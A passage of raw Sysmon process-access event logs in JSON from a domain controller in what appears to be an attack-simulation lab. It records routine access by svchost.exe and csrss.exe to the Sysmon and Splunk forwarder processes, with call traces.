Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 